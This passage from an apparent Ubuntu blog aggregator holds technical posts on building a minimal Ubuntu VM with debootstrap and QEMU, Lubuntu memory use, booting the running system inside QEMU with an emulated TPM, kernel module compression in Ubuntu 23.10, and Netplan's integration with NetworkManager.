+-------------------+----------+
| Release           | Codename |
+-------------------+----------+
| 20.04             | Focal    |
+-------------------+----------+
| 22.04             | Jammy    |
+-------------------+----------+
| 24.04 Development | Noble    |
+-------------------+----------+

To install the initial minimal Ubuntu system, we’ll use the debootstrap utility. This utility will download and install the bare minimum packages needed to have a functional Ubuntu system. Keep in mind that the Ubuntu installation this tool makes is really minimal - it doesn’t even come with a bootloader or Linux kernel. We’ll need to make quite a few changes to this installation before it’s ready for use in a VM.

Assuming we’re installing Ubuntu 22.04 LTS into our VM, the command to use is:

sudo debootstrap jammy ./vdisk

After a few minutes, our new system should be downloaded and installed. (Note that debootstrap does require root privileges.)

Now we’re ready to customize the VM! To do this, we’ll use a utility called chroot - this utility allows us to “enter” an installed Linux system, so we can modify it without having to boot it. (This is done by changing the root directory (from the perspective of the chroot process) to whatever directory you specify, then launching a shell or program inside that directory. The shell or program will see its root directory as being the directory you specified, and voilà, it’s as if we’re “inside” the installed system without having to boot it. This is a very weak form of containerization and shouldn’t be relied on for security, but it’s perfect for what we’re doing.)

There’s one thing we have to account for before chrooting into our new Ubuntu installation. Some commands we need to run will assume that certain special directories are mounted properly - in particular, /proc should point to a procfs filesystem, /sys should point to a sysfs filesystem, /dev needs to contain all of the device files of our system, and /dev/pts needs to contain the device files for pseudoterminals (you don’t have to know what any of that means, just know that those four directories are important and have to be set up properly). If these directories are not properly mounted, some tools will behave strangely or not work at all. The easiest way to solve this problem is with bind mounts. These basically tell Linux to make the contents of one directory visible in some other directory too. (These are sort of like symlinks, but they work differently - a symlink says “I’m a link to something, go over here to see what I contain”, whereas a bind mount says “make this directory’s contents visible over here too”. The differences are subtle but important - a symlink can’t make files outside of a chroot visible inside the chroot. A bind mount, however, can.)

So let’s bind mount the needed directories from our system into the chroot:

sudo mount --bind /dev ./vdisk/dev
sudo mount --bind /proc ./vdisk/proc
sudo mount --bind /sys ./vdisk/sys
sudo mount --bind /dev/pts ./vdisk/dev/pts

And now we can chroot in!

sudo chroot ./vdisk

Run ping -c1 8.8.8.8 just to make sure that Internet access is working, and ping -c1 google.com to check DNS - if name resolution fails, you may need to copy the host’s /etc/resolv.conf file into the VM. However, you probably won’t have to do this. Assuming Internet is working, we can now start customizing things.

By default, debootstrap only enables the “main” repository of Ubuntu. This repository only contains free-and-open-source software that is supported by Canonical. This does *not* include most of the software available in Ubuntu - most of it is in the “universe”, “restricted”, and “multiverse” repositories. If you really know what you’re doing, you can leave some of these repositories out, but I would highly recommend you enable them. Also, only the “release” pocket is enabled by default - this pocket includes all of the software that came with your chosen version of Ubuntu when it was first released, but it doesn’t include bug fixes, security updates, or newer versions of software. All those are in the “updates”, “security”, and “backports” pockets.

To fix this, run the following block of code, adjusted for your release of Ubuntu:

tee /etc/apt/sources.list << ENDSOURCESLIST
deb http://archive.ubuntu.com/ubuntu jammy main universe restricted multiverse
deb http://archive.ubuntu.com/ubuntu jammy-updates main universe restricted multiverse
deb http://archive.ubuntu.com/ubuntu jammy-security main universe restricted multiverse
deb http://archive.ubuntu.com/ubuntu jammy-backports main universe restricted multiverse
ENDSOURCESLIST

Replace “jammy” with the codename corresponding to your chosen release of Ubuntu. Once you’ve run this, run cat /etc/apt/sources.list to make sure the file looks right, then run apt update to refresh your software database with the newly enabled repositories. Once that’s done, run apt full-upgrade to update any software in the base installation that’s out-of-date.

What exactly you install at this point is up to you, but here’s my list of recommendations:

  • linux-generic. Highly recommended. This provides the Linux kernel. Without it, you’re going to have significant trouble booting. You can replace this with a different kernel metapackage if you want to for some reason (like linux-lowlatency).

  • grub-pc. Highly recommended. This is the bootloader. You might be able to replace this with an alternative bootloader like systemd-boot.

  • vim (or some other decent text editor that runs in a terminal). Highly recommended. The minimal install of Ubuntu doesn’t come with a good text editor, and you’ll almost certainly want one.

  • sudo. Highly recommended. The minimal install doesn’t include sudo either, and both the “add a user to the sudo group” step later in this guide and commands like sudo nmtui inside the VM depend on it.

  • network-manager. Highly recommended. If you don’t install this or some other network manager, you won’t have Internet access. You can replace this with an alternative network manager if you’d like.

  • tmux. Recommended. Unless you’re going to install a graphical environment, you’ll probably want a terminal multiplexer so you don’t have to juggle TTYs (which is especially painful in QEMU).

  • openssh-server. Optional. This is handy since it lets you use your terminal emulator of choice on your physical machine to interface with the virtual machine. You won’t be stuck using a rather clumsy and slow TTY in a QEMU display.

  • pulseaudio. Very optional. Provides sound support within the VM.

  • icewm + xserver-xorg + xinit + xterm. Very optional. If you need or want a graphical environment, this should provide you with a fairly minimal and fast one. You’ll still log in at a TTY, but you can use startx to start a desktop.

Add whatever software you want to this list, remove whatever you don’t want, and then install it all with this command:

apt install listOfPackages

Replace “listOfPackages” with the actual list of packages you want to install. For instance, if I were to install everything in the above list except openssh-server and pulseaudio, I would use:

apt install linux-generic grub-pc sudo vim network-manager tmux icewm xserver-xorg xinit xterm

At this point our software is installed, but the VM still needs a few more things before it can boot on its own.

  • We need to install and configure the bootloader.

  • We need an /etc/fstab file, or the system will boot with the drive mounted read-only.

  • We should probably make a non-root user with sudo access.

  • There’s a file in Ubuntu that will prevent Internet access from working. We should delete it now.

The bootloader is pretty easy to install and configure. Just run:

grub-install /dev/nbd0
update-grub

(No sudo needed here - we’re already root inside the chroot.)

For /etc/fstab, there are a few options. One particularly good one is to label the partition we installed Ubuntu into using e2label, then use that label as the ID of the drive we want to mount as root. That can be done like this:

e2label /dev/nbd0p1 ubuntu-inst
echo "LABEL=ubuntu-inst / ext4 defaults 0 1" > /etc/fstab

Making a user account is fairly easy:

adduser user # follow the prompts to create the user
adduser user sudo

And lastly, we should remove the Internet blocker file. I don’t understand why exactly this file exists in Ubuntu, but it does, and it causes problems for me when I make a minimal VM in this way. Removing it fixes the problem.

rm /usr/lib/NetworkManager/conf.d/10-globally-managed-devices.conf

EDIT: January 21, 2024: This rm command isn’t actually a permanent fix - an update to NetworkManager can end up putting this file back, breaking networking again. Rather than using rm on it, you should dpkg-divert it somewhere benign, for instance with dpkg-divert --divert /var/nm-globally-managed-devices-junk.old --rename /usr/lib/NetworkManager/conf.d/10-globally-managed-devices.conf, which will persist even after an update.

And that’s it! Now we can exit the chroot, unmount everything, and detach the disk image from our host machine.

exit
sudo umount ./vdisk/dev/pts
sudo umount ./vdisk/dev
sudo umount ./vdisk/proc
sudo umount ./vdisk/sys
sudo umount ./vdisk
sudo qemu-nbd -d /dev/nbd0

Now we can try and boot the VM. But before doing that, it’s probably a good idea to make a VM launcher script. Run vim ./startVM.sh (replacing “vim” with your text editor of choice), then type the following contents into the file:

#!/bin/bash
qemu-system-x86_64 -enable-kvm -machine q35 -m 4G -smp 2 -vga qxl -display sdl -monitor stdio -device intel-hda -device hda-duplex -usb -device usb-tablet -drive file=./ubuntu.img,format=qcow2,if=virtio

Refer to the qemu-system-x86_64 manpage or QEMU Invocation documentation page at https://www.qemu.org/docs/master/system/invocation.html for more info on what all these options do. Basically this gives you a VM with 4 GB RAM, 2 CPU cores, decent graphics (not 3d accelerated but not as bad as plain VGA), and audio support. You can tweak the amount of RAM and number of CPU cores by changing the -m and -smp parameters respectively. You’ll have access to the QEMU monitor through whatever terminal you run the launcher script in, allowing you to do things like switch to a different TTY, insert and remove devices and storage media on the fly, and things like that.

Finally, it’s time to see if it works.

chmod +x ./startVM.sh
./startVM.sh

If all goes well, the VM should boot and you should be able to log in! If you installed IceWM and its accompanying software like mentioned earlier, try running startx once you log in. This should pop open a functional IceWM desktop.
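(If startx lands you somewhere other than IceWM - which shouldn’t normally happen, but just in case - one possible fix is a minimal ~/.xinitrc that launches IceWM’s session explicitly. Treat this as a sketch; icewm-session is the session wrapper shipped by the icewm package:

echo "exec icewm-session" > ~/.xinitrc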

Some other things you should test once you’re logged in:

  • Do you have Internet access? ping -c1 8.8.8.8 can be used to test. If you don’t have Internet, run sudo nmtui in a terminal and add a new Ethernet network within the VM, then try activating it. If you get an error about the Ethernet device being strictly unmanaged, you probably forgot to remove the /usr/lib/NetworkManager/conf.d/10-globally-managed-devices.conf file mentioned earlier.

  • Can you write anything to the drive? Try running touch test to make sure. If you can’t, you probably forgot to create the /etc/fstab file.

If either of these things doesn’t work, you can power off the VM, then re-attach the VM’s virtual disk to your host machine, mount it, and chroot in like this:

sudo qemu-nbd -f qcow2 -c /dev/nbd0 ./ubuntu.img
sudo mount /dev/nbd0p1 ./vdisk
sudo chroot vdisk

Since all you’ll be doing is writing or removing a file, you don’t need to bind mount all the special directories we had to work with earlier.

Once you’re done fixing whatever is wrong, you can exit the VM, unmount and detach its disk, and then try to boot it again like this:

exit
sudo umount vdisk
sudo qemu-nbd -d /dev/nbd0
./startVM.sh

You now have a fully functional, minimal VM! Some extra tips that you may find handy:

  • If you choose to install an SSH server into your VM, you can use the “hostfwd” setting in QEMU to forward a port on your local machine to port 22 within the VM. This will allow you to SSH into the VM. Add a parameter like -nic user,hostfwd=tcp:127.0.0.1:2222-:22 to your QEMU command in the “startVM.sh” script. This will forward port 2222 of your host machine to port 22 of the VM. Then you can SSH into the VM by running ssh user@127.0.0.1 -p 2222. The “hostfwd” QEMU feature is documented at https://www.qemu.org/docs/master/system/invocation.html - just search the page for “hostfwd” to find it.

  • If you intend to use the VM through SSH only and don’t want a QEMU window at all, remove the following three parameters from the QEMU command in “startVM.sh”:

    • -vga qxl

    • -display sdl

    • -monitor stdio

    Then add the following switch:

    • -nographic

    This will disable the graphical QEMU window entirely and provide no video hardware to the VM.

  • You can disable sound support by removing the following switches from the QEMU command in “startVM.sh”:

    • -device intel-hda

    • -device hda-duplex

There’s lots more you can do with QEMU and manual Ubuntu installations like this, but I think this should give you a good start. Hope you find this useful! God bless.


on November 30, 2023 10:34 PM

November 25, 2023

In 2020 I reviewed LiveCD memory usage.

I was hoping to review either Wayland-only or immutable-only distros (think ostree/flatpak/snaps etc.), but for various reasons, on my setup it would just have been a GNOME comparison, and that’s just not as interesting. There are just too many distros/variants for me to do a full follow-up.

Lubuntu has previously always been the winner, so let's just see how Lubuntu 23.10 is doing today.

Previously, in 2020, Lubuntu needed 585 MB of RAM to be able to run something from the live CD. With a fresh install today, Lubuntu can still launch QTerminal with just 540 MB of RAM (not apples to apples, but still)! And that’s without the zram it had last time.

I decided to try removing some parts of the base system to see the cost of each component (to roughly 10 MB accuracy). I disabled networking to try to make it a fairer comparison.

  • Snapd - 30 MiB
  • Printing - cups foomatic - 10 MiB
  • rsyslog/crons - 10 MiB

Rsyslog impact

Of the three above, it felt like rsyslog (and cron) are the most redundant on a modern Linux system with systemd. So I tried hammering the logging system to see if I could cause a slowdown, by having a service echo lots of gibberish every 0.1 seconds.
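The exact unit isn’t shown here, but a sketch of such a gibberish service (an assumption on my part - the noise source and 0.1-second interval are arbitrary) could be saved as /etc/systemd/system/gibberish.service:

[Unit]
Description=Log spam generator for rsyslog/journald testing

[Service]
# stdout lands in the journal (and in syslog too, when rsyslog is running)
ExecStart=/bin/sh -c 'while true; do head -c 200 /dev/urandom | base64; sleep 0.1; done'

[Install]
WantedBy=multi-user.target

Then systemctl daemon-reload && systemctl start gibberish would kick it off.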

After an hour of uptime, this is how much space was used:

  • syslog 575M
  • journal at 1008M

CPU usage on a fresh boot afterwards:

With Rsyslog

  • gibberish service was at 1% CPU usage
  • rsyslog was at 2-3%
  • journal was at ~4%

Without Rsyslog

  • gibberish service was at 1% CPU usage
  • journal was at 1-3%

That's a pretty extreme case, but does show some impact of rsyslog, which in most desktop settings is redundant anyway.

Testing notes:

  • 2 CPUs (Copy host config)
  • Lubuntu 23.10 install
  • no swap file
  • ext4, no encryption
  • login automatically
  • Used virt-manager; the only non-default change was enabling UEFI
on November 25, 2023 02:42 AM

November 19, 2023

In this article I will show you how to start your current operating system inside a virtual machine. That is: launching the operating system (with all your settings, files, and everything), inside a virtual machine, while you’re using it.

This article was written for Ubuntu, but it can be easily adapted to other distributions, and with appropriate care it can be adapted to non-Linux kernels and operating systems as well.

Motivation

Before we start, why would a sane person want to do this in the first place? Well, here’s why I did it:

  • To test changes that affect Secure Boot without a reboot.

    Recently I was doing some experiments with Secure Boot and the Trusted Platform Module (TPM) on a new laptop, and I got frustrated by how time-consuming it was to test changes to the boot chain. Every time I modified a file involved during boot, I would need to reboot, then log in, then re-open my terminal windows and files to make more modifications… Plus, whenever I screwed up, I would need to manually recover my system, which would be even more time-consuming.

    I thought that I could speed up my experiments by using a virtual machine instead.

  • To predict the future TPM state (in particular, the values of PCRs 4, 5, 8, and 9) after a change, without a reboot.

    I wanted to predict the values of my TPM PCR banks after making changes to the bootloader, kernel, and initrd. Writing a script to calculate the PCR values automatically is in principle not that hard (and I actually did it before, in a different context), but I wanted a robust, generic solution that would work on most systems and in most situations, and emulation was the natural choice.

  • And, of course, just for the fun of it!

To be honest, I’m not a big fan of Secure Boot. The reason why I’ve been working on it is simply that it’s the standard nowadays and so I have to stick with it. Also, there are no real alternatives out there to achieve the same goals. I’ll write an article about Secure Boot in the future to explain the reasons why I don’t like it, and how to make it work better, but that’s another story…

Procedure

The procedure that I’m going to describe has 3 main steps:

  1. create a copy of your drive
  2. emulate a TPM device using swtpm
  3. emulate the system with QEMU

I’ve tested this procedure on Ubuntu 23.04 (Lunar) and 23.10 (Mantic), but it should work on any Linux distribution with minimal adjustments. The general approach can be used for any operating system, as long as appropriate replacements for QEMU and swtpm exist.

Prerequisites

Before we can start, we need to install:

  • QEMU: a virtual machine emulator
  • swtpm: a TPM emulator
  • OVMF: a UEFI firmware implementation

On a recent version of Ubuntu, these can be installed with:

sudo apt install qemu-system-x86 ovmf swtpm

Note that OVMF only supports the x86_64 architecture, so we can only emulate that. If you run a different architecture, you’ll need to find another UEFI implementation that is not OVMF (but I’m not aware of any freely available ones).

Create a copy of your drive

We can decide to either:

  • Choice #1: run only the components involved early at boot (shim, bootloader, kernel, initrd). This is useful if you, like me, only need to test those components and how they affect Secure Boot and the TPM, and don’t really care about the rest (the init process, login manager, …).

  • Choice #2: run the entire operating system. This can give you a fully usable operating system running inside the virtual machine, but may also result in some instability inside the guest (because we’re giving it a filesystem that is in use), and may also lead to some data loss if we’re not careful and make typos. Use with care!

Choice #1: Early boot components only

If we’re interested in the early boot components only, then we need to make a copy of the following from our drive: the GPT partition table, the EFI partition, and the /boot partition (if we have one). Usually all these 3 pieces are at the “start” of the drive, but this is not always the case.

To figure out where the partitions are located, run:

sudo parted -l

On my system, this is the output:

Model: WD_BLACK SN750 2TB (nvme)
Disk /dev/nvme0n1: 2000GB
Sector size (logical/physical): 512B/512B
Partition Table: gpt
Disk Flags:

Number  Start   End     Size    File system  Name  Flags
 1      1049kB  525MB   524MB   fat32              boot, esp
 2      525MB   1599MB  1074MB  ext4
 3      1599MB  2000GB  1999GB                     lvm

In my case, the partition number 1 is the EFI partition, and the partition number 2 is the /boot partition. If you’re not sure what partitions to look for, run mount | grep -e /boot -e /efi. Note that, on some distributions (most notably the ones that use systemd-boot), a /boot partition may not exist, so you can leave that out in that case.

Anyway, in my case, I need to copy the first 1599 MB of my drive, because that’s where the data I’m interested in ends: those first 1599 MB contain the GPT partition table (which is always at the start of the drive), the EFI partition, and the /boot partition.

Now that we have identified how many bytes to copy, we can copy them to a file named drive.img with dd (maybe after running sync to make sure that all changes have been committed):

# replace '/dev/nvme0n1' with your main drive (which may be '/dev/sda' instead),
# and 'count' with the number of MBs to copy
sync && sudo -g disk dd if=/dev/nvme0n1 of=drive.img bs=1M count=1599 conv=sparse

Choice #2: Entire system

If we want to run our entire system in a virtual machine, then I would recommend creating a QEMU copy-on-write (COW) file:

# replace '/dev/nvme0n1' with your main drive (which may be '/dev/sda' instead)
sudo -g disk qemu-img create -f qcow2 -b /dev/nvme0n1 -F raw drive.qcow2

This will create a new copy-on-write image using /dev/nvme0n1 as its “backing storage”. Be very careful when running this command: you don’t want to mess up the order of the arguments, or you might end up writing to your storage device (leading to data loss)!

The advantage of using a copy-on-write file, as opposed to copying the whole drive, is that this is much faster. Also, if we had to copy the entire drive, we might not even have enough space for it (even when using sparse files).

The big drawback of using a copy-on-write file is that, because our main drive likely contains filesystems that are mounted read-write, any modification to the filesystems on the host may be perceived as data corruption on the guest, and that in turn may cause all sort of bad consequences inside the guest, including kernel panics.

Another drawback is that, with this solution, later we will need to give QEMU permission to read our drive, and if we’re not careful enough with the commands we type (e.g. we swap the order of some arguments, or make some typos), we may potentially end up writing to the drive instead.

Emulate a TPM device using swtpm

There are various ways to run the swtpm emulator. Here I will use the “vTPM proxy” way, which is not the easiest, but has the advantage that the emulated device will look like a real TPM device not only to the guest, but also to the host, so that we can inspect its PCR banks (among other things) from the host using familiar tools like tpm2_pcrread.
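(For comparison: the easier route is swtpm’s “socket” mode, described in QEMU’s TPM documentation. It skips the kernel proxy entirely, but then the emulated TPM is only visible to the guest, not to the host. A sketch of that mode:

mkdir /tmp/mytpm
swtpm socket --tpmstate dir=/tmp/mytpm --ctrl type=unixio,path=/tmp/mytpm/swtpm-sock --tpm2

On the QEMU side you would then use -chardev socket,id=chrtpm,path=/tmp/mytpm/swtpm-sock -tpmdev emulator,id=tpm0,chardev=chrtpm -device tpm-tis,tpmdev=tpm0 instead of the passthrough options used below.)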

First, enable the tpm_vtpm_proxy module (which is not enabled by default on Ubuntu):

sudo modprobe tpm_vtpm_proxy

If that worked, we should have a /dev/vtpmx device. We can verify its presence with:

ls /dev/vtpmx

swtpm in “vTPM proxy” mode will interact with /dev/vtpmx, but in order to do so it needs the sys_admin capability. On Ubuntu, swtpm ships with this capability explicitly disabled by AppArmor, but we can enable it with:

sudo sh -c "echo '  capability sys_admin,' > /etc/apparmor.d/local/usr.bin.swtpm"
sudo systemctl reload apparmor

Now that /dev/vtpmx is present, and swtpm can talk to it, we can run swtpm in “vTPM proxy” mode:

sudo mkdir /tmp/swtpm-state
sudo swtpm chardev --tpmstate dir=/tmp/swtpm-state --vtpm-proxy --tpm2

Upon start, swtpm should create a new /dev/tpmN device and print its name on the terminal. On my system, I already have a real TPM on /dev/tpm0, and therefore swtpm allocates /dev/tpm1.

The emulated TPM device will need to be readable and writeable by QEMU, but the emulated TPM device is by default accessible only by root, so either we run QEMU as root (not recommended), or we relax the permissions on the device:

# replace '/dev/tpm1' with the device created by swtpm
sudo chmod a+rw /dev/tpm1

Make sure not to accidentally change the permissions of your real TPM device!

Emulate the system with QEMU

Inside the QEMU emulator, we will run the OVMF UEFI firmware. On Ubuntu, the firmware comes in 2 flavors:

  • with Secure Boot enabled (/usr/share/OVMF/OVMF_CODE_4M.ms.fd), and
  • with Secure Boot disabled (in /usr/share/OVMF/OVMF_CODE_4M.fd)

(There are actually even more flavors, see this AskUbuntu question for the details.)

In the commands that follow I’m going to use the Secure Boot flavor, but if you need to disable Secure Boot in your guest, just replace .ms.fd with .fd in all the commands below.

To use OVMF, first we need to copy the EFI variables to a file that can be read & written by QEMU:

cp /usr/share/OVMF/OVMF_VARS_4M.ms.fd /tmp/

This file (/tmp/OVMF_VARS_4M.ms.fd) will be the equivalent of the EFI flash storage, and it’s where OVMF will read and store its configuration, which is why we need to make a copy of it (to avoid modifications to the original file).

Now we’re ready to run QEMU:

  • If you copied only the early boot files (choice #1):

    # replace '/dev/tpm1' with the device created by swtpm
    qemu-system-x86_64 \
      -accel kvm \
      -machine q35,smm=on \
      -cpu host \
      -smp cores=4,threads=1 \
      -m 4096 \
      -vga virtio \
      -drive if=pflash,unit=0,format=raw,file=/usr/share/OVMF/OVMF_CODE_4M.ms.fd,readonly=on \
      -drive if=pflash,unit=1,format=raw,file=/tmp/OVMF_VARS_4M.ms.fd \
      -drive if=virtio,format=raw,file=drive.img \
      -tpmdev passthrough,id=tpm0,path=/dev/tpm1,cancel-path=/dev/null \
      -device tpm-tis,tpmdev=tpm0
    
  • If you have a copy-on-write file for the entire system (choice #2):

    # replace '/dev/tpm1' with the device created by swtpm
    sudo -g disk qemu-system-x86_64 \
      -accel kvm \
      -machine q35,smm=on \
      -cpu host \
      -smp cores=4,threads=1 \
      -m 4096 \
      -vga virtio \
      -drive if=pflash,unit=0,format=raw,file=/usr/share/OVMF/OVMF_CODE_4M.ms.fd,readonly=on \
      -drive if=pflash,unit=1,format=raw,file=/tmp/OVMF_VARS_4M.ms.fd \
      -drive if=virtio,format=qcow2,file=drive.qcow2 \
      -tpmdev passthrough,id=tpm0,path=/dev/tpm1,cancel-path=/dev/null \
      -device tpm-tis,tpmdev=tpm0
    

    Note that this last command makes QEMU run as the disk group: on Ubuntu, this group has the permission to read and write all storage devices, so be careful when running this command, or you risk losing your files forever! If you want to add more safety, you may consider using an ACL to give the user running QEMU read-only permission to your backing storage.
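    One way to do that - a sketch, with the device name adjusted to yours - is to add a read-only ACL for your user and then drop the sudo -g disk prefix entirely:

    sudo setfacl -m u:$USER:r /dev/nvme0n1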

In either case, after launching QEMU, our operating system should boot… while running inside itself!

In some circumstances though it may happen that the wrong operating system is booted, or that you end up at the EFI setup screen. This can happen if your system is not configured to boot from the “first” EFI entry listed in the EFI partition. Because the boot order is not recorded anywhere on the storage device (it’s recorded in the EFI flash memory), of course OVMF won’t know which operating system you intended to boot, and will just attempt to launch the first one it finds. You can use the EFI setup screen provided by OVMF to change the boot order in the way you like. After that, changes will be saved into the /tmp/OVMF_VARS_4M.ms.fd file on the host: you should keep a copy of that file so that, next time you launch QEMU, you’ll boot directly into your operating system.

Reading PCR banks after boot

Once our operating system has launched inside QEMU, and after the boot process is complete, the PCR banks will be filled and recorded by swtpm.

If we choose to copy only the early boot files (choice #1), then of course our operating system won’t be fully booted: it’ll likely hang waiting for the root filesystem to appear, and may eventually drop to the initrd shell. None of that really matters if all we want is to see the PCR values stored by the bootloader.

Before we can extract those PCR values, we first need to stop QEMU (Ctrl-C is fine), and then we can read them with tpm2_pcrread:

# replace '/dev/tpm1' with the device created by swtpm
tpm2_pcrread -T device:/dev/tpm1

Using the method described here in this article, PCRs 4, 5, 8, and 9 inside the emulated TPM should match the PCRs in our real TPM. And here comes an interesting application of this method: if we upgrade our bootloader or kernel, and we want to know the future PCR values that our system will have after reboot, we can simply follow this procedure and obtain those PCR values without shutting down our system! This can be especially useful if we use TPM sealing: we can reseal our secrets and make them unsealable at the next reboot without trouble.

Restarting the virtual machine

If we want to restart the guest inside the virtual machine, and obtain a consistent TPM state every time, we should start from a “clean” state every time, which means:

  1. restart swtpm
  2. recreate the drive.img or drive.qcow2 file
  3. launch QEMU again

If we don’t restart swtpm, the virtual TPM state (and in particular the PCR banks) won’t be cleared, and new PCR measurements will simply be added on top of the existing state. If we don’t recreate the drive file, it’s possible that some modifications to the filesystems will have an impact on the future PCR measurements.

We don’t necessarily need to recreate the /tmp/OVMF_VARS_4M.ms.fd file every time. In fact, if you need to modify any EFI setting to make your system bootable, you might want to preserve it so that you don’t need to change EFI settings at every boot.
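Putting those steps together, a reset between runs for choice #2 could look like the following sketch (device and file names as used above; restarting swtpm is what clears the volatile PCR banks):

sudo pkill swtpm
sudo swtpm chardev --tpmstate dir=/tmp/swtpm-state --vtpm-proxy --tpm2 &
# note the new /dev/tpmN it prints and relax its permissions again (chmod a+rw), then:
sudo -g disk qemu-img create -f qcow2 -b /dev/nvme0n1 -F raw drive.qcow2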

Automating the entire process

I’m (very slowly) working on turning this entire procedure into a script, so that everything can be automated. Once I find some time I’ll finish the script and publish it, so if you liked this article, stay tuned, and let me know if you have any comment/suggestion/improvement/critique!

on November 19, 2023 04:33 PM

November 16, 2023



Ubuntu systems typically have up to 3 kernels installed before older ones are auto-removed by apt on classic installs. Historically, the installation was optimized for metered download size only. However, kernel size growth and usage patterns no longer warrant such optimizations. During the 23.10 Mantic Minotaur cycle, I led a coordinated effort across multiple teams to implement many optimizations that together achieved unprecedented install footprint improvements.

Given a typical install of 3 generic kernel ABIs in the default configuration on a regular-sized VM (2 CPU cores, 8 GB of RAM), the following metrics are achieved in Ubuntu 23.10 versus Ubuntu 22.04 LTS:

  • 2x less disk space used (1,417MB vs 2,940MB, including initrd)

  • 3x less peak RAM usage for the initrd boot (68MB vs 204MB)

  • 0.5x increase in download size (949MB vs 600MB)

  • 2.5x faster initrd generation (4.5s vs 11.3s)

  • approximately the same total time (103s vs 98s, hardware dependent)


For minimal cloud images that do not install either linux-firmware or modules extra the numbers are:

  • 1.3x less disk space used (548MB vs 742MB)

  • 2.2x less peak RAM usage for initrd boot (27MB vs 62MB)

  • 0.4x increase in download size (207MB vs 146MB)


Hopefully, the compromise of download size, relative to the disk space & initrd savings is a win for the majority of platforms and use cases. For users on extremely expensive and metered connections, the likely best saving is to receive air-gapped updates or skip updates.


This was achieved by precompressing kernel modules & firmware files with the maximum level of Zstd compression at package build time; making the actual .deb files uncompressed; assembling the initrd using split cpio archives - uncompressed for the pre-compressed files, whilst compressing only the userspace portions of the initrd; enabling in-kernel module decompression support with a matching kmod; fixing bugs in all of the above; and landing all of these things in time for the feature freeze. Whilst doing so, we leveraged the experience and some of the design choices and implementations we have already been shipping on Ubuntu Core. Some of these changes are backported to Jammy, but only enough to support smooth upgrades to Mantic and later. The complete gains can only be experienced on Mantic and later.
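To see the resulting split-cpio layout on a Mantic system, you can unpack an initrd with unmkinitramfs (shipped in initramfs-tools-core) - purely an illustration, not part of the delivered tooling:

unmkinitramfs /boot/initrd.img-$(uname -r) /tmp/initrd-unpacked
ls /tmp/initrd-unpacked
# expect one or more 'early*' directories (uncompressed cpio segments) alongside 'main' (the compressed userspace portion)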


The discovered bugs in the kernel module loading code likely affect systems that use the LoadPin LSM with in-kernel module decompression, as used on ChromeOS systems. Hopefully, Kees Cook or other ChromeOS developers pick up the kernel fixes from the stable trees. Or you know, just use Ubuntu kernels, as they do get fixes and features like these first.


The team that designed and delivered these changes is large: Benjamin Drung, Andrea Righi, Juerg Haefliger, Julian Andres Klode, Steve Langasek, Michael Hudson-Doyle, Robert Kratky, Adrien Nader, Tim Gardner, Roxana Nicolescu - and myself Dimitri John Ledkov ensuring the most optimal solution is implemented, everything lands on time, and even implementing portions of the final solution.


Hi, It's me, I am a Staff Engineer at Canonical and we are hiring https://canonical.com/careers.


Lots of additional technical details and benchmarks on a huge range of diverse hardware and architectures, and bikeshedding all the things below:


For questions and comments please post to the Kernel section on Ubuntu Discourse.



on November 16, 2023 10:45 AM

A lot of time has passed since my previous post on my work to make dhcpcd the drop-in replacement for the deprecated ISC dhclient a.k.a. isc-dhcp-client. Current status:

  • Upstream now regularly produces releases and with a smaller delta than before. This makes it easier to track possible breakage.
  • Debian packaging has essentially remained unchanged. A few Recommends were shuffled, but that's about it.
  • The only remaining bug is fixing the build for Hurd. Patches are welcome. Once that is fixed, bumping dhcpcd-base's priority to important is all that's left.
on November 16, 2023 09:38 AM

November 12, 2023

Ubuntu 23.10 “Mantic Minotaur” Desktop, showing network settings

We released Ubuntu 23.10 ‘Mantic Minotaur’ on 12 October 2023, shipping its proven and trusted network stack based on Netplan. Netplan has been the default tool to configure Linux networking on Ubuntu since 2016. In the past, it was primarily used to control the Server and Cloud variants of Ubuntu, while on Desktop systems it would hand over control to NetworkManager. In Ubuntu 23.10 this disparity in how the network stack is controlled on different Ubuntu platforms was closed by integrating NetworkManager with the underlying Netplan stack.

Netplan could already be used to describe network connections on Desktop systems managed by NetworkManager. But network connections created or modified through NetworkManager would not be known to Netplan, so it was a one-way street. Activating the bidirectional NetworkManager-Netplan integration allows for any configuration change made through NetworkManager to be propagated back into Netplan. Changes made in Netplan itself will still be visible in NetworkManager, as before. This way, Netplan can be considered the “single source of truth” for network configuration across all variants of Ubuntu, with the network configuration stored in /etc/netplan/, using Netplan’s common and declarative YAML format.

Netplan Desktop integration

On workstations, the most common scenario is for users to configure networking through NetworkManager’s graphical interface, instead of driving it through Netplan’s declarative YAML files. Netplan ships a “libnetplan” library that provides an API to access Netplan’s parser and validation internals, which is now used by NetworkManager to store any network interface configuration changes in Netplan. For instance, network configuration defined through NetworkManager’s graphical UI or D-Bus API will be exported to Netplan’s native YAML format in the common location at /etc/netplan/. This way, the only thing administrators need to care about when managing a fleet of Desktop installations is Netplan. Furthermore, programmatic access to all network configuration is now easily accessible to other system components integrating with Netplan, such as snapd. This solution has already been used in more confined environments, such as Ubuntu Core and is now enabled by default on Ubuntu 23.10 Desktop.

Migration of existing connection profiles

On installation of the NetworkManager package (network-manager >= 1.44.2-1ubuntu1) in Ubuntu 23.10, all your existing connection profiles from /etc/NetworkManager/system-connections/ will automatically and transparently be migrated to Netplan’s declarative YAML format and stored in its common configuration directory /etc/netplan/.

The same migration will happen in the background whenever you add or modify any connection profile through the NetworkManager user interface, integrated with GNOME Shell. From this point on, Netplan will be aware of your entire network configuration and you can query it using its CLI tools, such as “sudo netplan get” or “sudo netplan status” without interrupting traditional NetworkManager workflows (UI, nmcli, nmtui, D-Bus APIs). You can observe this migration on the apt-get command line, watching out for logs like the following:

Setting up network-manager (1.44.2-1ubuntu1.1) ...
Migrating HomeNet (9d087126-ae71-4992-9e0a-18c5ea92a4ed) to /etc/netplan
Migrating eduroam (37d643bb-d81d-4186-9402-7b47632c59b1) to /etc/netplan
Migrating DebConf (f862be9c-fb06-4c0f-862f-c8e210ca4941) to /etc/netplan
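After the migration you can inspect the result from the Netplan side. A quick illustration - the file name below is an assumption derived from the UUID in the log above, as migrated profiles are stored one file per connection profile:

ls /etc/netplan/
# e.g. 90-NM-9d087126-ae71-4992-9e0a-18c5ea92a4ed.yaml
sudo netplan get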

In order to prepare for a smooth transition, NetworkManager tests were integrated into Netplan’s continuous integration pipeline at the upstream GitHub repository. Furthermore, we implemented a passthrough method of handling unknown or new settings that cannot yet be fully covered by Netplan, making Netplan future-proof for any upcoming NetworkManager release.

The future of Netplan

